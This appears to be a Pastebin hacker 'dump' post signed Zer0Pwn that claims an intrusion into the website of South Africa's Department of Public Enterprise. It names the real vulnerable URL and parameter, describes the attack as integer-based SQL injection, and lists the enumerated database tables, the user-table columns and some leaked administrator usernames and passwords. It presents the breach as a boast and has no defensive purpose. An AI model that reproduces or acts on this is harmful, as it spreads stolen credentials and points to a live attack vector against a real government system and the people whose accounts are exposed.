Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ______ ___ _____
- |___ / / _ \| __ \
- / / ___ _ __| | | | |__) |_ ___ __
- / / / _ \ '__| | | | ___/\ \ /\ / / '_ \
- / /_| __/ | | |_| | | \ V V /| | | |
- /_____\___|_| \___/|_| \_/\_/ |_| |_| @Zer0Pwn - Zer0Pwn
- ##############################################
- Hello everyone, today's dump includes:
- Administrator Usernames and Passwords for the Department of Public Enterprise of South Africa.
- ##############################################
- Target ==> Department of Public Enterprise of South Africa
- URL ==> http://www.dep.gov.za/
- Vulnerability ==> SQL Injection Integer Based
- Reason ==> To prove lack of security in anything and everything.
- Vulnerable Link ==> http://www.dpe.gov.za/home.php?id=*VULN*
- ##############################################
- Database: dpeago_db2
- Tables:
- +----------------+
- | Navigation |
- | Survey_2008 |
- | content |
- | sitecontent |
- | subscribers |
- | tblStats |
- | tempnavigation |
- | tools |
- | users |
- +----------------+
- Columns for users:
- +-----------+--------------+
- | Column | Type |
- +-----------+--------------+
- | Active | char(2) |
- | Created | datetime |
- | FirstName | varchar(250) |
- | ID | int(11) |
- | Modified | datetime |
- | Password | varchar(50) |
- | Surname | varchar(250) |
- | UserName | varchar(50) |
- +-----------+--------------+
- Username and Password:
- +----------+----------+
- | Password | UserName |
- +----------+----------+
- | NULL | NULL |
- | andrew | andrew |
- | tc | tc |
- +----------+----------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement